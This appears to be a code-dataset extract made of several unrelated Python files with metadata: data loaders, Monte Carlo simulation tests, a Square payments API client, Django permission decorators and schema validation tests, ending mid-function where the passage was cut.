| 0
| 0.653061
| 0.557823
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e85a22e7d52a8fc8d048fce3abadd9d077eb41a3
| 1,406
|
py
|
Python
|
data_loader.py
|
BoykoMihail/marketBubblePrediction
|
beaaad50c709a6a4dffd4881e5648104a5c9d200
|
[
"MIT"
] | null | null | null |
data_loader.py
|
BoykoMihail/marketBubblePrediction
|
beaaad50c709a6a4dffd4881e5648104a5c9d200
|
[
"MIT"
] | null | null | null |
data_loader.py
|
BoykoMihail/marketBubblePrediction
|
beaaad50c709a6a4dffd4881e5648104a5c9d200
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import pkg_resources
import pandas as pd
def sp500_2017():
stream = pkg_resources.resource_stream(__name__, 'data/sp500_2017.csv')
return pd.read_csv(stream, encoding='latin-1')
def sp500_2000():
stream = pkg_resources.resource_stream(__name__, 'data/sp500_2000.csv')
return pd.read_csv(stream, encoding='latin-1')
def sp500_2019():
stream = pkg_resources.resource_stream(__name__, 'data/sp500_2019.csv')
return pd.read_csv(stream, encoding='latin-1')
def sp500_1990():
stream = pkg_resources.resource_stream(__name__, 'data/sp500_1990.csv')
return pd.read_csv(stream, encoding='latin-1')
def sp500_1970():
stream = pkg_resources.resource_stream(__name__, 'data/sp500_1970.csv')
return pd.read_csv(stream, encoding='latin-1')
def sp500_2007():
stream = pkg_resources.resource_stream(__name__, 'data/sp500_2007.csv')
return pd.read_csv(stream, encoding='latin-1')
def sp500_1926():
stream = pkg_resources.resource_stream(__name__, 'data/sp500_1926.csv')
return pd.read_csv(stream, encoding='latin-1')
def illumina_2001():
stream = pkg_resources.resource_stream(__name__, 'data/ILMN_2001.csv')
return pd.read_csv(stream, encoding='latin-1')
def illumina_2017():
stream = pkg_resources.resource_stream(__name__, 'data/ILMN_2017.csv')
return pd.read_csv(stream, encoding='latin-1')
| 31.244444
| 75
| 0.72973
| 200
| 1,406
| 4.72
| 0.16
| 0.127119
| 0.17161
| 0.247881
| 0.880297
| 0.880297
| 0.880297
| 0.880297
| 0.444915
| 0.444915
| 0
| 0.101569
| 0.138691
| 1,406
| 44
| 76
| 31.954545
| 0.677952
| 0.014225
| 0
| 0.310345
| 0
| 0
| 0.167509
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.310345
| false
| 0
| 0.068966
| 0
| 0.689655
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
e886bdddb1bfe22c0f280e700586be08c92136d8
| 12,628
|
py
|
Python
|
applications/MultilevelMonteCarloApplication/tests/test_xmcAlgorithm.py
|
SADPR/Kratos
|
82d1e335d2e7e674f77022a3d91c958168805d59
|
[
"BSD-4-Clause"
] | null | null | null |
applications/MultilevelMonteCarloApplication/tests/test_xmcAlgorithm.py
|
SADPR/Kratos
|
82d1e335d2e7e674f77022a3d91c958168805d59
|
[
"BSD-4-Clause"
] | null | null | null |
applications/MultilevelMonteCarloApplication/tests/test_xmcAlgorithm.py
|
SADPR/Kratos
|
82d1e335d2e7e674f77022a3d91c958168805d59
|
[
"BSD-4-Clause"
] | null | null | null |
# Import python class test
import unittest
# Import python libraries
import json
import sys
import os
# Import xmc classes
import xmc
# Import PyCOMPSs
# from exaqute.ExaquteTaskPyCOMPSs import get_value_from_remote # to execute with runcompss
# from exaqute.ExaquteTaskHyperLoom import get_value_from_remote # to execute with the IT4 scheduler
from exaqute.ExaquteTaskLocal import get_value_from_remote # to execute with python3
class TestXMCAlgorithm(unittest.TestCase):
def test_mc_asynchronous_Kratos(self):
# read parameters
parametersList = ["parameters/parameters_xmc_test_mc_Kratos_asynchronous_poisson_2d.json", \
"parameters/parameters_xmc_test_mc_Kratos_asynchronous_poisson_2d_with_combined_power_sums.json", \
"parameters/parameters_xmc_test_mc_Kratos_asynchronous_poisson_2d_with_10_combined_power_sums.json", \
"parameters/parameters_xmc_test_mc_Kratos_poisson_2d.json", \
"parameters/parameters_xmc_test_mc_Kratos_poisson_2d_with_combined_power_sums.json"]
for parametersPath in parametersList:
with open(parametersPath,'r') as parameter_file:
parameters = json.load(parameter_file)
# add path of the problem folder to python path
problem_id = parameters["solverWrapperInputDictionary"]["problemId"]
sys.path.append(os.path.join("poisson_square_2d_xmc"))
# SampleGenerator
samplerInputDictionary = parameters["samplerInputDictionary"]
samplerInputDictionary['randomGeneratorInputDictionary'] = parameters["randomGeneratorInputDictionary"]
samplerInputDictionary['solverWrapperInputDictionary'] = parameters["solverWrapperInputDictionary"]
# MonteCarloIndex
monteCarloIndexInputDictionary = parameters["monteCarloIndexInputDictionary"]
monteCarloIndexInputDictionary["samplerInputDictionary"] = samplerInputDictionary
# Moment Estimators
qoiEstimatorInputDictionary = parameters["qoiEstimatorInputDictionary"]
combinedEstimatorInputDictionary = parameters["combinedEstimatorInputDictionary"]
costEstimatorInputDictionary = parameters["costEstimatorInputDictionary"]
# qoi estimators
monteCarloIndexInputDictionary["qoiEstimator"] = [monteCarloIndexInputDictionary["qoiEstimator"][0] for _ in range (0,parameters["solverWrapperInputDictionary"]["numberQoI"])]
monteCarloIndexInputDictionary["qoiEstimatorInputDictionary"] = [qoiEstimatorInputDictionary]*parameters["solverWrapperInputDictionary"]["numberQoI"]
# combined estimators
monteCarloIndexInputDictionary["combinedEstimator"] = [monteCarloIndexInputDictionary["combinedEstimator"][0] for _ in range (0,parameters["solverWrapperInputDictionary"]["numberCombinedQoi"])]
monteCarloIndexInputDictionary["combinedEstimatorInputDictionary"] = [combinedEstimatorInputDictionary]*parameters["solverWrapperInputDictionary"]["numberCombinedQoi"]
# cost estimator
monteCarloIndexInputDictionary["costEstimatorInputDictionary"] = costEstimatorInputDictionary
# MonoCriterion
criteriaArray = []
criteriaInputs = []
for monoCriterion in (parameters["monoCriteriaInpuctDict"]):
criteriaArray.append(xmc.monoCriterion.MonoCriterion(\
parameters["monoCriteriaInpuctDict"][monoCriterion]["criteria"],\
parameters["monoCriteriaInpuctDict"][monoCriterion]["tolerance"]))
criteriaInputs.append([parameters["monoCriteriaInpuctDict"][monoCriterion]["input"]])
# MultiCriterion
multiCriterionInputDictionary=parameters["multiCriterionInputDictionary"]
multiCriterionInputDictionary["criteria"] = criteriaArray
multiCriterionInputDictionary["inputsForCriterion"] = criteriaInputs
criterion = xmc.multiCriterion.MultiCriterion(**multiCriterionInputDictionary)
# ErrorEstimator
statErrorEstimator = xmc.errorEstimator.ErrorEstimator(**parameters["errorEstimatorInputDictionary"])
# HierarchyOptimiser
hierarchyCostOptimiser = xmc.hierarchyOptimiser.HierarchyOptimiser(**parameters["hierarchyOptimiserInputDictionary"])
# EstimationAssembler
if "expectationAssembler" in parameters["estimationAssemblerInputDictionary"].keys():
expectationAssembler = xmc.estimationAssembler.EstimationAssembler(**parameters["estimationAssemblerInputDictionary"]["expectationAssembler"])
if "varianceAssembler" in parameters["estimationAssemblerInputDictionary"].keys():
varianceAssembler = xmc.estimationAssembler.EstimationAssembler(**parameters["estimationAssemblerInputDictionary"]["varianceAssembler"])
# MonteCarloSampler
monteCarloSamplerInputDictionary = parameters["monteCarloSamplerInputDictionary"]
monteCarloSamplerInputDictionary["indexConstructorDictionary"] = monteCarloIndexInputDictionary
monteCarloSamplerInputDictionary["assemblers"] = [expectationAssembler,varianceAssembler]
monteCarloSamplerInputDictionary["errorEstimators"] = [statErrorEstimator]
mcSampler = xmc.monteCarloSampler.MonteCarloSampler(**monteCarloSamplerInputDictionary)
# XMCAlgorithm
XMCAlgorithmInputDictionary = parameters["XMCAlgorithmInputDictionary"]
XMCAlgorithmInputDictionary["monteCarloSampler"] = mcSampler
XMCAlgorithmInputDictionary["hierarchyOptimiser"] = hierarchyCostOptimiser
XMCAlgorithmInputDictionary["stoppingCriterion"] = criterion
algo = xmc.XMCAlgorithm(**XMCAlgorithmInputDictionary)
if (parameters["solverWrapperInputDictionary"]["asynchronous"] is True):
algo.runAsynchronousXMC()
else:
algo.runXMC()
# test
estimations = get_value_from_remote(algo.estimation())
estimated_mean = 1.5
self.assertAlmostEqual(estimations[0],estimated_mean,delta=0.1)
self.assertEqual(algo.monteCarloSampler.indices[0].costEstimator._sampleCounter,15)
def test_mlmc_asynchronous_Kratos(self):
# read parameters
parametersList = ["parameters/parameters_xmc_test_mlmc_Kratos_asynchronous_poisson_2d.json", \
"parameters/parameters_xmc_test_mlmc_Kratos_asynchronous_poisson_2d_with_combined_power_sums.json", \
"parameters/parameters_xmc_test_mlmc_Kratos_poisson_2d.json", \
"parameters/parameters_xmc_test_mlmc_Kratos_poisson_2d_with_combined_power_sums.json"]
for parametersPath in parametersList:
with open(parametersPath,'r') as parameter_file:
parameters = json.load(parameter_file)
# add path of the problem folder to python path
problem_id = parameters["solverWrapperInputDictionary"]["problemId"]
sys.path.append(os.path.join("poisson_square_2d_xmc"))
# SampleGenerator
samplerInputDictionary = parameters["samplerInputDictionary"]
samplerInputDictionary['randomGeneratorInputDictionary'] = parameters["randomGeneratorInputDictionary"]
samplerInputDictionary['solverWrapperInputDictionary'] = parameters["solverWrapperInputDictionary"]
# MonteCarloIndex Constructor
monteCarloIndexInputDictionary = parameters["monteCarloIndexInputDictionary"]
monteCarloIndexInputDictionary["samplerInputDictionary"] = samplerInputDictionary
# Moment Estimators
qoiEstimatorInputDictionary = parameters["qoiEstimatorInputDictionary"]
combinedEstimatorInputDictionary = parameters["combinedEstimatorInputDictionary"]
costEstimatorInputDictionary = parameters["costEstimatorInputDictionary"]
# qoi estimators
monteCarloIndexInputDictionary["qoiEstimator"] = [monteCarloIndexInputDictionary["qoiEstimator"][0] for _ in range (0,parameters["solverWrapperInputDictionary"]["numberQoI"])]
monteCarloIndexInputDictionary["qoiEstimatorInputDictionary"] = [qoiEstimatorInputDictionary]*parameters["solverWrapperInputDictionary"]["numberQoI"]
# combined estimators
monteCarloIndexInputDictionary["combinedEstimator"] = [monteCarloIndexInputDictionary["combinedEstimator"][0] for _ in range (0,parameters["solverWrapperInputDictionary"]["numberCombinedQoi"])]
monteCarloIndexInputDictionary["combinedEstimatorInputDictionary"] = [combinedEstimatorInputDictionary]*parameters["solverWrapperInputDictionary"]["numberCombinedQoi"]
# cost estimator
monteCarloIndexInputDictionary["costEstimatorInputDictionary"] = costEstimatorInputDictionary
# MonoCriterion
criteriaArray = []
criteriaInputs = []
for monoCriterion in (parameters["monoCriteriaInpuctDict"]):
criteriaArray.append(xmc.monoCriterion.MonoCriterion(\
parameters["monoCriteriaInpuctDict"][monoCriterion]["criteria"],\
parameters["monoCriteriaInpuctDict"][monoCriterion]["tolerance"]))
criteriaInputs.append([parameters["monoCriteriaInpuctDict"][monoCriterion]["input"]])
# MultiCriterion
multiCriterionInputDictionary=parameters["multiCriterionInputDictionary"]
multiCriterionInputDictionary["criteria"] = criteriaArray
multiCriterionInputDictionary["inputsForCriterion"] = criteriaInputs
criterion = xmc.multiCriterion.MultiCriterion(**multiCriterionInputDictionary)
# ErrorEstimator
MSEErrorEstimator = xmc.errorEstimator.ErrorEstimator(**parameters["errorEstimatorInputDictionary"])
# HierarchyOptimiser
hierarchyCostOptimiser = xmc.hierarchyOptimiser.HierarchyOptimiser(**parameters["hierarchyOptimiserInputDictionary"])
# EstimationAssembler
if "expectationAssembler" in parameters["estimationAssemblerInputDictionary"].keys():
expectationAssembler = xmc.estimationAssembler.EstimationAssembler(**parameters["estimationAssemblerInputDictionary"]["expectationAssembler"])
if "discretizationErrorAssembler" in parameters["estimationAssemblerInputDictionary"].keys():
discretizationErrorAssembler = xmc.estimationAssembler.EstimationAssembler(**parameters["estimationAssemblerInputDictionary"]["discretizationErrorAssembler"])
if "varianceAssembler" in parameters["estimationAssemblerInputDictionary"].keys():
varianceAssembler = xmc.estimationAssembler.EstimationAssembler(**parameters["estimationAssemblerInputDictionary"]["varianceAssembler"])
# MonteCarloSampler
monteCarloSamplerInputDictionary = parameters["monteCarloSamplerInputDictionary"]
monteCarloSamplerInputDictionary["indexConstructorDictionary"] = monteCarloIndexInputDictionary
monteCarloSamplerInputDictionary["assemblers"] = [expectationAssembler,discretizationErrorAssembler,varianceAssembler]
monteCarloSamplerInputDictionary["errorEstimators"] = [MSEErrorEstimator]
mcSampler = xmc.monteCarloSampler.MonteCarloSampler(**monteCarloSamplerInputDictionary)
# XMCAlgorithm
XMCAlgorithmInputDictionary = parameters["XMCAlgorithmInputDictionary"]
XMCAlgorithmInputDictionary["monteCarloSampler"] = mcSampler
XMCAlgorithmInputDictionary["hierarchyOptimiser"] = hierarchyCostOptimiser
XMCAlgorithmInputDictionary["stoppingCriterion"] = criterion
algo = xmc.XMCAlgorithm(**XMCAlgorithmInputDictionary)
if (parameters["solverWrapperInputDictionary"]["asynchronous"] is True):
algo.runAsynchronousXMC()
else:
algo.runXMC()
# test
estimations = get_value_from_remote(algo.estimation())
estimated_mean = 1.47
self.assertAlmostEqual(estimations[0],estimated_mean,delta=1.0)
self.assertEqual(algo.monteCarloSampler.indices[0].costEstimator._sampleCounter,15) # level 0
self.assertEqual(algo.monteCarloSampler.indices[1].costEstimator._sampleCounter,15) # level 1
self.assertEqual(algo.monteCarloSampler.indices[2].costEstimator._sampleCounter,15) # level 2
if __name__ == '__main__':
unittest.main()
| 68.259459
| 205
| 0.72949
| 783
| 12,628
| 11.595147
| 0.182631
| 0.058597
| 0.0228
| 0.026765
| 0.914969
| 0.905606
| 0.895693
| 0.884459
| 0.872233
| 0.835334
| 0
| 0.004797
| 0.191083
| 12,628
| 184
| 206
| 68.630435
| 0.883994
| 0.070874
| 0
| 0.738462
| 0
| 0
| 0.291324
| 0.234001
| 0
| 0
| 0
| 0
| 0.046154
| 1
| 0.015385
| false
| 0
| 0.046154
| 0
| 0.069231
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e8a39caeaa2ffe1151301a707fa9886859204d03
| 165
|
py
|
Python
|
fairseq_ext/__init__.py
|
IBM/transition-amr-parser
|
dfd8352ea2ee3ff153b691edb6cd7ee541d53b2e
|
[
"Apache-2.0"
] | 76
|
2019-11-25T04:00:15.000Z
|
2022-03-31T00:33:44.000Z
|
fairseq_ext/__init__.py
|
IBM/transition-amr-parser
|
dfd8352ea2ee3ff153b691edb6cd7ee541d53b2e
|
[
"Apache-2.0"
] | 22
|
2019-10-10T09:39:24.000Z
|
2022-03-28T06:39:06.000Z
|
fairseq_ext/__init__.py
|
IBM/transition-amr-parser
|
dfd8352ea2ee3ff153b691edb6cd7ee541d53b2e
|
[
"Apache-2.0"
] | 20
|
2019-10-08T17:02:17.000Z
|
2022-03-20T01:43:42.000Z
|
# to register all the user defined modules to fairseq
import fairseq_ext.criterions # noqa
import fairseq_ext.models # noqa
import fairseq_ext.tasks # noqa
| 33
| 53
| 0.769697
| 24
| 165
| 5.166667
| 0.583333
| 0.314516
| 0.387097
| 0.322581
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.187879
| 165
| 4
| 54
| 41.25
| 0.925373
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
2cebdbc8b84264e3d13f4d9a1a1ff7a419f735e0
| 119
|
py
|
Python
|
torch_ac/algos/__init__.py
|
jsikyoon/torch-ac
|
4d44ed3eb7a81a583a0c9619e0d4fb142a4a3d6b
|
[
"MIT"
] | 1
|
2021-03-19T02:59:45.000Z
|
2021-03-19T02:59:45.000Z
|
torch_ac/algos/__init__.py
|
jsikyoon/torch-ac
|
4d44ed3eb7a81a583a0c9619e0d4fb142a4a3d6b
|
[
"MIT"
] | null | null | null |
torch_ac/algos/__init__.py
|
jsikyoon/torch-ac
|
4d44ed3eb7a81a583a0c9619e0d4fb142a4a3d6b
|
[
"MIT"
] | 1
|
2021-12-12T18:22:03.000Z
|
2021-12-12T18:22:03.000Z
|
from torch_ac.algos.a2c import A2CAlgo
from torch_ac.algos.ppo import PPOAlgo
from torch_ac.algos.vmpo import VMPOAlgo
| 29.75
| 40
| 0.848739
| 21
| 119
| 4.666667
| 0.52381
| 0.27551
| 0.336735
| 0.489796
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018692
| 0.10084
| 119
| 3
| 41
| 39.666667
| 0.897196
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
2cf53bd8619663ea95a94c01698a295351390604
| 7,947
|
py
|
Python
|
square/api/reporting_api.py
|
hellysmile/square-python-sdk
|
5e68efd2c4a2210ef681e87710eba981a019dd08
|
[
"Apache-2.0"
] | null | null | null |
square/api/reporting_api.py
|
hellysmile/square-python-sdk
|
5e68efd2c4a2210ef681e87710eba981a019dd08
|
[
"Apache-2.0"
] | null | null | null |
square/api/reporting_api.py
|
hellysmile/square-python-sdk
|
5e68efd2c4a2210ef681e87710eba981a019dd08
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
square
This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ).
"""
from deprecation import deprecated
from square.api_helper import APIHelper
from square.http.api_response import ApiResponse
from square.api.base_api import BaseApi
from square.http.auth.o_auth_2 import OAuth2
class ReportingApi(BaseApi):
"""A Controller to access Endpoints in the square API."""
def __init__(self, config, call_back=None):
super(ReportingApi, self).__init__(config, call_back)
@deprecated()
def list_additional_recipient_receivable_refunds(self,
location_id,
begin_time=None,
end_time=None,
sort_order=None,
cursor=None):
"""Does a GET request to /v2/locations/{location_id}/additional-recipient-receivable-refunds.
Returns a list of refunded transactions (across all possible
originating locations) relating to monies
credited to the provided location ID by another Square account using
the `additional_recipients` field in a transaction.
Max results per [page](#paginatingresults): 50
Args:
location_id (string): The ID of the location to list
AdditionalRecipientReceivableRefunds for.
begin_time (string, optional): The beginning of the requested
reporting period, in RFC 3339 format. See [Date
ranges](#dateranges) for details on date
inclusivity/exclusivity. Default value: The current time
minus one year.
end_time (string, optional): The end of the requested reporting
period, in RFC 3339 format. See [Date ranges](#dateranges)
for details on date inclusivity/exclusivity. Default value:
The current time.
sort_order (SortOrder, optional): The order in which results are
listed in the response (`ASC` for oldest first, `DESC` for
newest first). Default value: `DESC`
cursor (string, optional): A pagination cursor returned by a
previous call to this endpoint. Provide this to retrieve the
next set of results for your original query. See [Paginating
results](#paginatingresults) for more information.
Returns:
ListAdditionalRecipientReceivableRefundsResponse: Response from
the API. Success
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/v2/locations/{location_id}/additional-recipient-receivable-refunds'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'location_id': location_id
})
_query_builder = self.config.get_base_uri()
_query_builder += _url_path
_query_parameters = {
'begin_time': begin_time,
'end_time': end_time,
'sort_order': sort_order,
'cursor': cursor
}
_query_builder = APIHelper.append_url_with_query_parameters(
_query_builder,
_query_parameters
)
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.config.http_client.get(_query_url, headers=_headers)
OAuth2.apply(self.config, _request)
_response = self.execute_request(_request)
decoded = APIHelper.json_deserialize(_response.text)
if type(decoded) is dict:
_errors = decoded.get('errors')
else:
_errors = None
_result = ApiResponse(_response, body=decoded, errors=_errors)
return _result
@deprecated()
def list_additional_recipient_receivables(self,
location_id,
begin_time=None,
end_time=None,
sort_order=None,
cursor=None):
"""Does a GET request to /v2/locations/{location_id}/additional-recipient-receivables.
Returns a list of receivables (across all possible sending locations)
representing monies credited
to the provided location ID by another Square account using the
`additional_recipients` field in a transaction.
Max results per [page](#paginatingresults): 50
Args:
location_id (string): The ID of the location to list
AdditionalRecipientReceivables for.
begin_time (string, optional): The beginning of the requested
reporting period, in RFC 3339 format. See [Date
ranges](#dateranges) for details on date
inclusivity/exclusivity. Default value: The current time
minus one year.
end_time (string, optional): The end of the requested reporting
period, in RFC 3339 format. See [Date ranges](#dateranges)
for details on date inclusivity/exclusivity. Default value:
The current time.
sort_order (SortOrder, optional): The order in which results are
listed in the response (`ASC` for oldest first, `DESC` for
newest first). Default value: `DESC`
cursor (string, optional): A pagination cursor returned by a
previous call to this endpoint. Provide this to retrieve the
next set of results for your original query. See [Paginating
results](#paginatingresults) for more information.
Returns:
ListAdditionalRecipientReceivablesResponse: Response from the API.
Success
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/v2/locations/{location_id}/additional-recipient-receivables'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'location_id': location_id
})
_query_builder = self.config.get_base_uri()
_query_builder += _url_path
_query_parameters = {
'begin_time': begin_time,
'end_time': end_time,
'sort_order': sort_order,
'cursor': cursor
}
_query_builder = APIHelper.append_url_with_query_parameters(
_query_builder,
_query_parameters
)
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.config.http_client.get(_query_url, headers=_headers)
OAuth2.apply(self.config, _request)
_response = self.execute_request(_request)
decoded = APIHelper.json_deserialize(_response.text)
if type(decoded) is dict:
_errors = decoded.get('errors')
else:
_errors = None
_result = ApiResponse(_response, body=decoded, errors=_errors)
return _result
| 41.826316
| 101
| 0.597206
| 826
| 7,947
| 5.544794
| 0.231235
| 0.030568
| 0.016594
| 0.018341
| 0.842358
| 0.826638
| 0.826638
| 0.821834
| 0.81441
| 0.81441
| 0
| 0.005916
| 0.340632
| 7,947
| 189
| 102
| 42.047619
| 0.86813
| 0.473135
| 0
| 0.780488
| 1
| 0
| 0.07529
| 0.035025
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036585
| false
| 0
| 0.060976
| 0
| 0.134146
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fa23706ab7a579acbe270a2e19ee3ed857c0aff7
| 1,467
|
py
|
Python
|
common/perm.py
|
BUPT-XJBGroup/BOJ-V4
|
31078ab998d0a786c6742b8f7c65f2e4d9642844
|
[
"MIT"
] | null | null | null |
common/perm.py
|
BUPT-XJBGroup/BOJ-V4
|
31078ab998d0a786c6742b8f7c65f2e4d9642844
|
[
"MIT"
] | null | null | null |
common/perm.py
|
BUPT-XJBGroup/BOJ-V4
|
31078ab998d0a786c6742b8f7c65f2e4d9642844
|
[
"MIT"
] | null | null | null |
from functools import wraps
from contest.models import Contest
from django.http import HttpResponseRedirect, JsonResponse, Http404
def view_permission_required(func):
def decorator(func):
@wraps(func)
def returned_wrapper(request, *args, **kwargs):
pk = kwargs.get('pk')
contest = Contest.objects.filter(pk=pk).first()
if pk and contest:
if request.user.has_perm('ojuser.view_groupprofile', contest.group) and contest.ended() >= 0:
return func(request, *args, **kwargs)
elif request.user.has_perm('ojuser.change_groupprofile', contest.group):
return func(request, *args, **kwargs)
raise Http404()
return returned_wrapper
if not func:
def foo(func):
return decorator(func)
return foo
return decorator(func)
def change_permission_required(func):
def decorator(func):
@wraps(func)
def returned_wrapper(request, *args, **kwargs):
pk = kwargs.get('pk')
contest = Contest.objects.filter(pk=pk).first()
if pk and contest and request.user.has_perm('ojuser.change_groupprofile', contest.group):
return func(request, *args, **kwargs)
raise Http404()
return returned_wrapper
if not func:
def foo(func):
return decorator(func)
return foo
return decorator(func)
| 34.116279
| 109
| 0.611452
| 165
| 1,467
| 5.351515
| 0.260606
| 0.055493
| 0.096263
| 0.061155
| 0.793884
| 0.736127
| 0.736127
| 0.736127
| 0.736127
| 0.736127
| 0
| 0.009597
| 0.289707
| 1,467
| 42
| 110
| 34.928571
| 0.837812
| 0
| 0
| 0.75
| 0
| 0
| 0.054608
| 0.051877
| 0
| 0
| 0
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.083333
| 0.055556
| 0.611111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
fa3ab431dde8781bff5297c9338140fd849c8037
| 98
|
py
|
Python
|
apps/validators/password_validator.py
|
LucasRohr/flask-api
|
42e971a60ad0e32f8b59ec22089e8d39aecce595
|
[
"BSD-3-Clause"
] | 1
|
2020-02-15T02:22:48.000Z
|
2020-02-15T02:22:48.000Z
|
apps/validators/password_validator.py
|
LucasRohr/flask-api
|
42e971a60ad0e32f8b59ec22089e8d39aecce595
|
[
"BSD-3-Clause"
] | 6
|
2020-03-24T18:15:25.000Z
|
2021-12-13T20:32:44.000Z
|
apps/validators/password_validator.py
|
LucasRohr/flask-api
|
42e971a60ad0e32f8b59ec22089e8d39aecce595
|
[
"BSD-3-Clause"
] | null | null | null |
def check_password_in_signup(password, confirm_password):
return password == confirm_password
| 32.666667
| 57
| 0.826531
| 12
| 98
| 6.333333
| 0.583333
| 0.394737
| 0.605263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112245
| 98
| 2
| 58
| 49
| 0.873563
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 1
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 8
|
d76f95c95dfc12899629fdabbffedc6ed60d2389
| 2,586
|
py
|
Python
|
tests/types/test_array.py
|
manoadamro/flapi-schema
|
840cfe4bd0ff1e057c3ace9931bd35d8fdaf7808
|
[
"MIT"
] | null | null | null |
tests/types/test_array.py
|
manoadamro/flapi-schema
|
840cfe4bd0ff1e057c3ace9931bd35d8fdaf7808
|
[
"MIT"
] | null | null | null |
tests/types/test_array.py
|
manoadamro/flapi-schema
|
840cfe4bd0ff1e057c3ace9931bd35d8fdaf7808
|
[
"MIT"
] | null | null | null |
import unittest
import flapi_schema.errors
import flapi_schema.types
class BasicSchema(flapi_schema.types.Schema):
thing = flapi_schema.types.Bool()
class ArrayTest(unittest.TestCase):
def test_min_only(self):
prop = flapi_schema.types.Array(flapi_schema.types.Bool, min_length=0)
self.assertEqual(prop([True, True]), [True, True])
def test_min_only_out_of_range(self):
prop = flapi_schema.types.Array(flapi_schema.types.Bool, min_length=1)
self.assertRaises(flapi_schema.errors.SchemaValidationError, prop, [])
def test_max_only(self):
prop = flapi_schema.types.Array(flapi_schema.types.Bool, max_length=3)
self.assertEqual(prop([True, True]), [True, True])
def test_max_only_out_of_range(self):
prop = flapi_schema.types.Array(flapi_schema.types.Bool, max_length=3)
self.assertRaises(
flapi_schema.errors.SchemaValidationError, prop, [True, True, True, True]
)
def test_min_and_max(self):
prop = flapi_schema.types.Array(
flapi_schema.types.Bool, min_length=0, max_length=3
)
self.assertEqual(prop([True, True]), [True, True])
def test_min_and_max_out_of_range(self):
prop = flapi_schema.types.Array(
flapi_schema.types.Bool, min_length=0, max_length=3
)
self.assertRaises(
flapi_schema.errors.SchemaValidationError, prop, [True, True, True, True]
)
def test_no_range(self):
prop = flapi_schema.types.Array(flapi_schema.types.Bool)
self.assertEqual(prop([True, True, True, True]), [True, True, True, True])
def test_array_of_property(self):
prop = flapi_schema.types.Array(flapi_schema.types.Bool)
self.assertEqual(prop([True, True]), [True, True])
def test_array_of_property_fails(self):
prop = flapi_schema.types.Array(flapi_schema.types.Bool)
self.assertRaises(flapi_schema.errors.SchemaValidationError, prop, [True, ""])
def test_wrong_type(self):
